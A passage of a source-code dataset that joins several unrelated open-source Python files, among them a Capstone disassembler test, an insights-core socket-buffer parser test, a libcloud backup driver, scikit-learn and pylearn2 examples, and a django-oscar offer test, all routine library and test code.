print("\t\t\toperands[%u].crx.scale: = %u" \
% (c, i.crx.scale))
if i.crx.reg != 0:
print("\t\t\toperands[%u].crx.reg: REG = %s" \
% (c, insn.reg_name(i.crx.reg)))
if i.crx.cond != 0:
print("\t\t\toperands[%u].crx.cond: 0x%x" \
% (c, i.crx.cond))
c += 1
if insn.bc:
print("\tBranch code: %u" % insn.bc)
if insn.bh:
print("\tBranch hint: %u" % insn.bh)
if insn.update_cr0:
print("\tUpdate-CR0: True")
# ## Test class Cs
def test_class():
for (arch, mode, code, comment) in all_tests:
print("*" * 16)
print("Platform: %s" % comment)
print("Code: %s" % to_hex(code))
print("Disasm:")
try:
md = Cs(arch, mode)
md.detail = True
for insn in md.disasm(code, 0x1000):
print_insn_detail(insn)
print ()
print("0x%x:\n" % (insn.address + insn.size))
except CsError as e:
print("ERROR: %s" % e)
if __name__ == '__main__':
test_class()
|
RedHatInsights/insights-core | refs/heads/master | insights/parsers/tests/test_sendq_recvq_socket_buffer.py | 1 | import doctest
import pytest
from insights.parsers import ParseException
from insights.tests import context_wrap
from insights.parsers import sendq_recvq_socket_buffer
from insights.parsers.sendq_recvq_socket_buffer import SendQSocketBuffer, RecvQSocketBuffer
SENDQ_SOCKET_BUFFER = """
4096 16384 4194304
""".strip()
EMPTY_SENDQ_SOCKET_BUFFER = """
""".strip()
RECVQ_SOCKET_BUFFER = """
4096 87380 6291456
""".strip()
EMPTY_RECVQ_SOCKET_BUFFER = """
""".strip()
def test_empty_sendq_socket_buffer():
with pytest.raises(ParseException) as exc:
SendQSocketBuffer(context_wrap(EMPTY_SENDQ_SOCKET_BUFFER))
assert str(exc.value) == "Empty content"
def test_sendq_socket_buffer():
sendq_buffer = SendQSocketBuffer(context_wrap(SENDQ_SOCKET_BUFFER))
assert sendq_buffer.minimum == 4096
assert sendq_buffer.default == 16384
assert sendq_buffer.maximum == 4194304
assert sendq_buffer.raw == '4096 16384 4194304'
def test_empty_recvq_socket_buffer():
with pytest.raises(ParseException) as exc:
RecvQSocketBuffer(context_wrap(EMPTY_RECVQ_SOCKET_BUFFER))
assert str(exc.value) == "Empty content"
def test_recvq_socket_buffer():
recvq_buffer = RecvQSocketBuffer(context_wrap(RECVQ_SOCKET_BUFFER))
assert recvq_buffer.minimum == 4096
assert recvq_buffer.default == 87380
assert recvq_buffer.maximum == 6291456
assert recvq_buffer.raw == '4096 87380 6291456'
def test_doc():
env = {
'sendq_buffer_values': SendQSocketBuffer(context_wrap(SENDQ_SOCKET_BUFFER)),
'recvq_buffer_values': RecvQSocketBuffer(context_wrap(RECVQ_SOCKET_BUFFER)),
}
failures, tests = doctest.testmod(sendq_recvq_socket_buffer, globs=env)
assert failures == 0
|
aljscott/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/editdistance.py | 138 | # Copyright (c) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from array import array
def edit_distance(str1, str2):
unsignedShort = 'h'
distances = [array(unsignedShort, (0,) * (len(str2) + 1)) for i in range(0, len(str1) + 1)]
# distances[0][0] = 0 since distance between str1[:0] and str2[:0] is 0
for i in range(1, len(str1) + 1):
distances[i][0] = i # Distance between str1[:i] and str2[:0] is i
for j in range(1, len(str2) + 1):
distances[0][j] = j # Distance between str1[:0] and str2[:j] is j
for i in range(0, len(str1)):
for j in range(0, len(str2)):
diff = 0 if str1[i] == str2[j] else 1
# Deletion, Insertion, Identical / Replacement
distances[i + 1][j + 1] = min(distances[i + 1][j] + 1, distances[i][j + 1] + 1, distances[i][j] + diff)
return distances[len(str1)][len(str2)]
|
erjohnso/libcloud | refs/heads/trunk | libcloud/backup/drivers/dimensiondata.py | 13 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.utils.py3 import ET
from libcloud.backup.base import BackupDriver, BackupTarget, BackupTargetJob
from libcloud.backup.types import BackupTargetType
from libcloud.backup.types import Provider
from libcloud.common.dimensiondata import dd_object_to_id
from libcloud.common.dimensiondata import DimensionDataConnection
from libcloud.common.dimensiondata import DimensionDataBackupClient
from libcloud.common.dimensiondata import DimensionDataBackupClientAlert
from libcloud.common.dimensiondata import DimensionDataBackupClientType
from libcloud.common.dimensiondata import DimensionDataBackupDetails
from libcloud.common.dimensiondata import DimensionDataBackupSchedulePolicy
from libcloud.common.dimensiondata import DimensionDataBackupStoragePolicy
from libcloud.common.dimensiondata import API_ENDPOINTS, DEFAULT_REGION
from libcloud.common.dimensiondata import TYPES_URN
from libcloud.common.dimensiondata import GENERAL_NS, BACKUP_NS
from libcloud.utils.xml import fixxpath, findtext, findall
# pylint: disable=no-member
DEFAULT_BACKUP_PLAN = 'Advanced'
class DimensionDataBackupDriver(BackupDriver):
"""
DimensionData backup driver.
"""
selected_region = None
connectionCls = DimensionDataConnection
name = 'Dimension Data Backup'
website = 'https://cloud.dimensiondata.com/'
type = Provider.DIMENSIONDATA
api_version = 1.0
network_domain_id = None
def __init__(self, key, secret=None, secure=True, host=None, port=None,
api_version=None, region=DEFAULT_REGION, **kwargs):
if region not in API_ENDPOINTS and host is None:
raise ValueError(
'Invalid region: %s, no host specified' % (region))
if region is not None:
self.selected_region = API_ENDPOINTS[region]
super(DimensionDataBackupDriver, self).__init__(
key=key, secret=secret,
secure=secure, host=host,
port=port,
api_version=api_version,
region=region,
**kwargs)
def _ex_connection_class_kwargs(self):
"""
Add the region to the kwargs before the connection is instantiated
"""
kwargs = super(DimensionDataBackupDriver,
self)._ex_connection_class_kwargs()
kwargs['region'] = self.selected_region
return kwargs
def get_supported_target_types(self):
"""
Get a list of backup target types this driver supports
:return: ``list`` of :class:``BackupTargetType``
"""
return [BackupTargetType.VIRTUAL]
def list_targets(self):
"""
List all backuptargets
:rtype: ``list`` of :class:`BackupTarget`
"""
targets = self._to_targets(
self.connection.request_with_orgId_api_2('server/server').object)
return targets
def create_target(self, name, address,
type=BackupTargetType.VIRTUAL, extra=None):
"""
Creates a new backup target
:param name: Name of the target (not used)
:type name: ``str``
:param address: The ID of the node in Dimension Data Cloud
:type address: ``str``
:param type: Backup target type, only Virtual supported
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
if extra is not None:
service_plan = extra.get('servicePlan', DEFAULT_BACKUP_PLAN)
else:
service_plan = DEFAULT_BACKUP_PLAN
extra = {'servicePlan': service_plan}
create_node = ET.Element('NewBackup',
{'xmlns': BACKUP_NS})
create_node.set('servicePlan', service_plan)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup' % (address),
method='POST',
data=ET.tostring(create_node)).object
asset_id = None
for info in findall(response,
'additionalInformation',
GENERAL_NS):
if info.get('name') == 'assetId':
asset_id = findtext(info, 'value', GENERAL_NS)
return BackupTarget(
id=asset_id,
name=name,
address=address,
type=type,
extra=extra,
driver=self
)
def create_target_from_node(self, node, type=BackupTargetType.VIRTUAL,
extra=None):
"""
Creates a new backup target from an existing node
:param node: The Node to backup
:type node: ``Node``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
return self.create_target(name=node.name,
address=node.id,
type=BackupTargetType.VIRTUAL,
extra=extra)
def create_target_from_container(self, container,
type=BackupTargetType.OBJECT,
extra=None):
"""
Creates a new backup target from an existing storage container
:param node: The Container to backup
:type node: ``Container``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
return NotImplementedError(
'create_target_from_container not supported for this driver')
def update_target(self, target, name=None, address=None, extra=None):
"""
Update the properties of a backup target, only changing the serviceplan
is supported.
:param target: Backup target to update
:type target: Instance of :class:`BackupTarget` or ``str``
:param name: Name of the target
:type name: ``str``
:param address: Hostname, FQDN, IP, file path etc.
:type address: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
if extra is not None:
service_plan = extra.get('servicePlan', DEFAULT_BACKUP_PLAN)
else:
service_plan = DEFAULT_BACKUP_PLAN
request = ET.Element('ModifyBackup',
{'xmlns': BACKUP_NS})
request.set('servicePlan', service_plan)
server_id = self._target_to_target_address(target)
self.connection.request_with_orgId_api_1(
'server/%s/backup/modify' % (server_id),
method='POST',
data=ET.tostring(request)).object
if isinstance(target, BackupTarget):
target.extra = extra
else:
target = self.ex_get_target_by_id(server_id)
return target
def delete_target(self, target):
"""
Delete a backup target
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget` or ``str``
:rtype: ``bool``
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup?disable' % (server_id),
method='GET').object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def list_recovery_points(self, target, start_date=None, end_date=None):
"""
List the recovery points available for a target
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget`
:param start_date: The start date to show jobs between (optional)
:type start_date: :class:`datetime.datetime`
:param end_date: The end date to show jobs between (optional)
:type end_date: :class:`datetime.datetime``
:rtype: ``list`` of :class:`BackupTargetRecoveryPoint`
"""
raise NotImplementedError(
'list_recovery_points not implemented for this driver')
def recover_target(self, target, recovery_point, path=None):
"""
Recover a backup target to a recovery point
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget`
:param recovery_point: Backup target with the backup data
:type recovery_point: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target not implemented for this driver')
def recover_target_out_of_place(self, target, recovery_point,
recovery_target, path=None):
"""
Recover a backup target to a recovery point out-of-place
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param recovery_point: Backup target with the backup data
:type recovery_point: Instance of :class:`BackupTarget`
:param recovery_target: Backup target with to recover the data to
:type recovery_target: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target_out_of_place not implemented for this driver')
def get_target_job(self, target, id):
"""
Get a specific backup job by ID
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param id: Backup target with the backup data
:type id: Instance of :class:`BackupTarget`
:rtype: :class:`BackupTargetJob`
"""
jobs = self.list_target_jobs(target)
return list(filter(lambda x: x.id == id, jobs))[0]
def list_target_jobs(self, target):
"""
List the backup jobs on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:rtype: ``list`` of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'list_target_jobs not implemented for this driver')
def create_target_job(self, target, extra=None):
"""
Create a new backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'create_target_job not implemented for this driver')
def resume_target_job(self, target, job):
"""
Resume a suspended backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to resume
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'resume_target_job not implemented for this driver')
def suspend_target_job(self, target, job):
"""
Suspend a running backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to suspend
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'suspend_target_job not implemented for this driver')
def cancel_target_job(self, job, ex_client=None, ex_target=None):
"""
Cancel a backup job on a target
:param job: Backup target job to cancel. If it is ``None``
ex_client and ex_target must be set
:type job: Instance of :class:`BackupTargetJob` or ``None``
:param ex_client: Client of the job to cancel.
Not necessary if job is specified.
DimensionData only has 1 job per client
:type ex_client: Instance of :class:`DimensionDataBackupClient`
or ``str``
:param ex_target: Target to cancel a job from.
Not necessary if job is specified.
:type ex_target: Instance of :class:`BackupTarget` or ``str``
:rtype: ``bool``
"""
if job is None:
if ex_client is None or ex_target is None:
raise ValueError("Either job or ex_client and "
"ex_target have to be set")
server_id = self._target_to_target_address(ex_target)
client_id = self._client_to_client_id(ex_client)
else:
server_id = job.target.address
client_id = job.extra['clientId']
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/%s?cancelJob' % (server_id,
client_id),
method='GET').object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def ex_get_target_by_id(self, id):
"""
Get a target by server id
:param id: The id of the target you want to get
:type id: ``str``
:rtype: :class:`BackupTarget`
"""
node = self.connection.request_with_orgId_api_2(
'server/server/%s' % id).object
return self._to_target(node)
def ex_add_client_to_target(self, target, client_type, storage_policy,
schedule_policy, trigger, email):
"""
Add a client to a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget` or ``str``
:param client: Client to add to the target
:type client: Instance of :class:`DimensionDataBackupClientType`
or ``str``
:param storage_policy: The storage policy for the client
:type storage_policy: Instance of
:class:`DimensionDataBackupStoragePolicy`
or ``str``
:param schedule_policy: The schedule policy for the client
:type schedule_policy: Instance of
:class:`DimensionDataBackupSchedulePolicy`
or ``str``
:param trigger: The notify trigger for the client
:type trigger: ``str``
:param email: The notify email for the client
:type email: ``str``
:rtype: ``bool``
"""
server_id = self._target_to_target_address(target)
backup_elm = ET.Element('NewBackupClient',
{'xmlns': BACKUP_NS})
if isinstance(client_type, DimensionDataBackupClientType):
ET.SubElement(backup_elm, "type").text = client_type.type
else:
ET.SubElement(backup_elm, "type").text = client_type
if isinstance(storage_policy, DimensionDataBackupStoragePolicy):
ET.SubElement(backup_elm,
"storagePolicyName").text = storage_policy.name
else:
ET.SubElement(backup_elm,
"storagePolicyName").text = storage_policy
if isinstance(schedule_policy, DimensionDataBackupSchedulePolicy):
ET.SubElement(backup_elm,
"schedulePolicyName").text = schedule_policy.name
else:
ET.SubElement(backup_elm,
"schedulePolicyName").text = schedule_policy
alerting_elm = ET.SubElement(backup_elm, "alerting")
alerting_elm.set('trigger', trigger)
ET.SubElement(alerting_elm, "emailAddress").text = email
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client' % (server_id),
method='POST',
data=ET.tostring(backup_elm)).object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def ex_remove_client_from_target(self, target, backup_client):
"""
Removes a client from a backup target
:param target: The backup target to remove the client from
:type target: :class:`BackupTarget` or ``str``
:param backup_client: The backup client to remove
:type backup_client: :class:`DimensionDataBackupClient` or ``str``
:rtype: ``bool``
"""
server_id = self._target_to_target_address(target)
client_id = self._client_to_client_id(backup_client)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/%s?disable' % (server_id, client_id),
method='GET').object
response_code = findtext(response, 'result', GENERAL_NS)
return response_code in ['IN_PROGRESS', 'SUCCESS']
def ex_get_backup_details_for_target(self, target):
"""
Returns a backup details object for a target
:param target: The backup target to get details for
:type target: :class:`BackupTarget` or ``str``
:rtype: :class:`DimensionDataBackupDetails`
"""
if not isinstance(target, BackupTarget):
target = self.ex_get_target_by_id(target)
if target is None:
return
response = self.connection.request_with_orgId_api_1(
'server/%s/backup' % (target.address),
method='GET').object
return self._to_backup_details(response, target)
def ex_list_available_client_types(self, target):
"""
Returns a list of available backup client types
:param target: The backup target to list available types for
:type target: :class:`BackupTarget` or ``str``
:rtype: ``list`` of :class:`DimensionDataBackupClientType`
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/type' % (server_id),
method='GET').object
return self._to_client_types(response)
def ex_list_available_storage_policies(self, target):
"""
Returns a list of available backup storage policies
:param target: The backup target to list available policies for
:type target: :class:`BackupTarget` or ``str``
:rtype: ``list`` of :class:`DimensionDataBackupStoragePolicy`
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/storagePolicy' % (server_id),
method='GET').object
return self._to_storage_policies(response)
def ex_list_available_schedule_policies(self, target):
"""
Returns a list of available backup schedule policies
:param target: The backup target to list available policies for
:type target: :class:`BackupTarget` or ``str``
:rtype: ``list`` of :class:`DimensionDataBackupSchedulePolicy`
"""
server_id = self._target_to_target_address(target)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup/client/schedulePolicy' % (server_id),
method='GET').object
return self._to_schedule_policies(response)
def _to_storage_policies(self, object):
elements = object.findall(fixxpath('storagePolicy', BACKUP_NS))
return [self._to_storage_policy(el) for el in elements]
def _to_storage_policy(self, element):
return DimensionDataBackupStoragePolicy(
retention_period=int(element.get('retentionPeriodInDays')),
name=element.get('name'),
secondary_location=element.get('secondaryLocation')
)
def _to_schedule_policies(self, object):
elements = object.findall(fixxpath('schedulePolicy', BACKUP_NS))
return [self._to_schedule_policy(el) for el in elements]
def _to_schedule_policy(self, element):
return DimensionDataBackupSchedulePolicy(
name=element.get('name'),
description=element.get('description')
)
def _to_client_types(self, object):
elements = object.findall(fixxpath('backupClientType', BACKUP_NS))
return [self._to_client_type(el) for el in elements]
def _to_client_type(self, element):
description = element.get('description')
if description is None:
description = findtext(element, 'description', BACKUP_NS)
return DimensionDataBackupClientType(
type=element.get('type'),
description=description,
is_file_system=bool(element.get('isFileSystem') == 'true')
)
def _to_backup_details(self, object, target):
return DimensionDataBackupDetails(
asset_id=object.get('assetId'),
service_plan=object.get('servicePlan'),
status=object.get('state'),
clients=self._to_clients(object, target)
)
def _to_clients(self, object, target):
elements = object.findall(fixxpath('backupClient', BACKUP_NS))
return [self._to_client(el, target) for el in elements]
def _to_client(self, element, target):
client_id = element.get('id')
return DimensionDataBackupClient(
id=client_id,
type=self._to_client_type(element),
status=element.get('status'),
schedule_policy=findtext(element, 'schedulePolicyName', BACKUP_NS),
storage_policy=findtext(element, 'storagePolicyName', BACKUP_NS),
download_url=findtext(element, 'downloadUrl', BACKUP_NS),
running_job=self._to_backup_job(element, target, client_id),
alert=self._to_alert(element)
)
def _to_alert(self, element):
alert = element.find(fixxpath('alerting', BACKUP_NS))
if alert is not None:
notify_list = [
email_addr.text for email_addr
in alert.findall(fixxpath('emailAddress', BACKUP_NS))
]
return DimensionDataBackupClientAlert(
trigger=element.get('trigger'),
notify_list=notify_list
)
return None
def _to_backup_job(self, element, target, client_id):
running_job = element.find(fixxpath('runningJob', BACKUP_NS))
if running_job is not None:
return BackupTargetJob(
id=running_job.get('id'),
status=running_job.get('status'),
progress=int(running_job.get('percentageComplete')),
driver=self.connection.driver,
target=target,
extra={'clientId': client_id}
)
return None
def _to_targets(self, object):
node_elements = object.findall(fixxpath('server', TYPES_URN))
return [self._to_target(el) for el in node_elements]
def _to_target(self, element):
backup = findall(element, 'backup', TYPES_URN)
if len(backup) == 0:
return
extra = {
'description': findtext(element, 'description', TYPES_URN),
'sourceImageId': findtext(element, 'sourceImageId', TYPES_URN),
'datacenterId': element.get('datacenterId'),
'deployedTime': findtext(element, 'createTime', TYPES_URN),
'servicePlan': backup[0].get('servicePlan')
}
n = BackupTarget(id=backup[0].get('assetId'),
name=findtext(element, 'name', TYPES_URN),
address=element.get('id'),
driver=self.connection.driver,
type=BackupTargetType.VIRTUAL,
extra=extra)
return n
@staticmethod
def _client_to_client_id(backup_client):
return dd_object_to_id(backup_client, DimensionDataBackupClient)
@staticmethod
def _target_to_target_address(target):
return dd_object_to_id(target, BackupTarget, id_value='address')
|
Drooids/odoo | refs/heads/8.0 | addons/hw_posbox_homepage/__openerp__.py | 313 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'PosBox Homepage',
'version': '1.0',
'category': 'Hardware Drivers',
'sequence': 6,
'website': 'https://www.odoo.com/page/point-of-sale',
'summary': 'A homepage for the PosBox',
'description': """
PosBox Homepage
===============
This module overrides openerp web interface to display a simple
Homepage that explains what's the posbox and show the status,
and where to find documentation.
If you activate this module, you won't be able to access the
regular openerp interface anymore.
""",
'author': 'OpenERP SA',
'depends': ['hw_proxy'],
'installable': False,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
chrsrds/scikit-learn | refs/heads/master | examples/linear_model/plot_lasso_coordinate_descent_path.py | 44 | """
=====================
Lasso and Elastic Net
=====================
Lasso and elastic net (L1 and L2 penalisation) implemented using a
coordinate descent.
The coefficients can be forced to be positive.
"""
print(__doc__)
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# License: BSD 3 clause
from itertools import cycle
import numpy as np
import matplotlib.pyplot as plt
from sklearn.linear_model import lasso_path, enet_path
from sklearn import datasets
diabetes = datasets.load_diabetes()
X = diabetes.data
y = diabetes.target
X /= X.std(axis=0) # Standardize data (easier to set the l1_ratio parameter)
# Compute paths
eps = 5e-3 # the smaller it is the longer is the path
print("Computing regularization path using the lasso...")
alphas_lasso, coefs_lasso, _ = lasso_path(X, y, eps, fit_intercept=False)
print("Computing regularization path using the positive lasso...")
alphas_positive_lasso, coefs_positive_lasso, _ = lasso_path(
X, y, eps, positive=True, fit_intercept=False)
print("Computing regularization path using the elastic net...")
alphas_enet, coefs_enet, _ = enet_path(
X, y, eps=eps, l1_ratio=0.8, fit_intercept=False)
print("Computing regularization path using the positive elastic net...")
alphas_positive_enet, coefs_positive_enet, _ = enet_path(
X, y, eps=eps, l1_ratio=0.8, positive=True, fit_intercept=False)
# Display results
plt.figure(1)
colors = cycle(['b', 'r', 'g', 'c', 'k'])
neg_log_alphas_lasso = -np.log10(alphas_lasso)
neg_log_alphas_enet = -np.log10(alphas_enet)
for coef_l, coef_e, c in zip(coefs_lasso, coefs_enet, colors):
l1 = plt.plot(neg_log_alphas_lasso, coef_l, c=c)
l2 = plt.plot(neg_log_alphas_enet, coef_e, linestyle='--', c=c)
plt.xlabel('-Log(alpha)')
plt.ylabel('coefficients')
plt.title('Lasso and Elastic-Net Paths')
plt.legend((l1[-1], l2[-1]), ('Lasso', 'Elastic-Net'), loc='lower left')
plt.axis('tight')
plt.figure(2)
neg_log_alphas_positive_lasso = -np.log10(alphas_positive_lasso)
for coef_l, coef_pl, c in zip(coefs_lasso, coefs_positive_lasso, colors):
l1 = plt.plot(neg_log_alphas_lasso, coef_l, c=c)
l2 = plt.plot(neg_log_alphas_positive_lasso, coef_pl, linestyle='--', c=c)
plt.xlabel('-Log(alpha)')
plt.ylabel('coefficients')
plt.title('Lasso and positive Lasso')
plt.legend((l1[-1], l2[-1]), ('Lasso', 'positive Lasso'), loc='lower left')
plt.axis('tight')
plt.figure(3)
neg_log_alphas_positive_enet = -np.log10(alphas_positive_enet)
for (coef_e, coef_pe, c) in zip(coefs_enet, coefs_positive_enet, colors):
l1 = plt.plot(neg_log_alphas_enet, coef_e, c=c)
l2 = plt.plot(neg_log_alphas_positive_enet, coef_pe, linestyle='--', c=c)
plt.xlabel('-Log(alpha)')
plt.ylabel('coefficients')
plt.title('Elastic-Net and positive Elastic-Net')
plt.legend((l1[-1], l2[-1]), ('Elastic-Net', 'positive Elastic-Net'),
loc='lower left')
plt.axis('tight')
plt.show()
|
fyffyt/pylearn2 | refs/heads/master | pylearn2/scripts/datasets/make_cifar100_patches.py | 41 | """
This script makes a dataset of two million approximately whitened patches,
extracted at random uniformly from the CIFAR-100 train dataset.
This script is intended to reproduce the preprocessing used by Adam Coates
et. al. in their work from the first half of 2011 on the CIFAR-10 and
STL-10 datasets.
"""
from __future__ import print_function
from pylearn2.utils import serial
from pylearn2.datasets import preprocessing
from pylearn2.datasets.cifar100 import CIFAR100
from pylearn2.utils import string_utils
import textwrap
def main():
data_dir = string_utils.preprocess('${PYLEARN2_DATA_PATH}')
print('Loading CIFAR-100 train dataset...')
data = CIFAR100(which_set='train')
print("Preparing output directory...")
patch_dir = data_dir + '/cifar100/cifar100_patches'
serial.mkdir(patch_dir)
README = open(patch_dir + '/README', 'w')
README.write(textwrap.dedent("""
The .pkl files in this directory may be opened in python using
cPickle, pickle, or pylearn2.serial.load.
data.pkl contains a pylearn2 Dataset object defining an unlabeled
dataset of 2 million 6x6 approximately whitened, contrast-normalized
patches drawn uniformly at random from the CIFAR-100 train set.
preprocessor.pkl contains a pylearn2 Pipeline object that was used
to extract the patches and approximately whiten / contrast normalize
them. This object is necessary when extracting features for
supervised learning or test set classification, because the
extracted features must be computed using inputs that have been
whitened with the ZCA matrix learned and stored by this Pipeline.
They were created with the pylearn2 script make_cifar100_patches.py.
All other files in this directory, including this README, were
created by the same script and are necessary for the other files
to function correctly.
"""))
README.close()
print("Preprocessing the data...")
pipeline = preprocessing.Pipeline()
pipeline.items.append(preprocessing.ExtractPatches(patch_shape=(6, 6),
num_patches=2*1000*1000))
pipeline.items.append(
preprocessing.GlobalContrastNormalization(sqrt_bias=10., use_std=True))
pipeline.items.append(preprocessing.ZCA())
data.apply_preprocessor(preprocessor=pipeline, can_fit=True)
data.use_design_loc(patch_dir + '/data.npy')
serial.save(patch_dir + '/data.pkl', data)
serial.save(patch_dir + '/preprocessor.pkl', pipeline)
if __name__ == "__main__":
main()
|
aselle/tensorflow | refs/heads/master | tensorflow/python/ops/losses/losses.py | 60 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Loss operations for use in neural networks.
Note: All the losses are added to the `GraphKeys.LOSSES` collection by default.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import
from tensorflow.python.ops.losses.losses_impl import *
from tensorflow.python.ops.losses.util import *
# pylint: enable=wildcard-import
|
itbabu/django-oscar | refs/heads/master | tests/integration/offer/post_order_action_tests.py | 21 | from decimal import Decimal as D
from django.test import TestCase
from oscar.apps.offer import models, utils, custom
from oscar.test import factories
from oscar.test.basket import add_product
class CustomAction(models.Benefit):
class Meta:
proxy = True
app_label = 'tests'
def apply(self, basket, condition, offer):
condition.consume_items(offer, basket, ())
return models.PostOrderAction(
"Something will happen")
def apply_deferred(self, basket, order, application):
return "Something happened"
@property
def description(self):
return "Will do something"
def create_offer():
range = models.Range.objects.create(
name="All products", includes_all_products=True)
condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=1)
benefit = custom.create_benefit(CustomAction)
return models.ConditionalOffer.objects.create(
condition=condition,
benefit=benefit,
offer_type=models.ConditionalOffer.SITE)
class TestAnOfferWithAPostOrderAction(TestCase):
def setUp(self):
self.basket = factories.create_basket(empty=True)
add_product(self.basket, D('12.00'), 1)
create_offer()
utils.Applicator().apply(self.basket)
def test_applies_correctly_to_basket_which_meets_condition(self):
self.assertEqual(1, len(self.basket.offer_applications))
self.assertEqual(
1, len(self.basket.offer_applications.post_order_actions))
action = self.basket.offer_applications.post_order_actions[0]
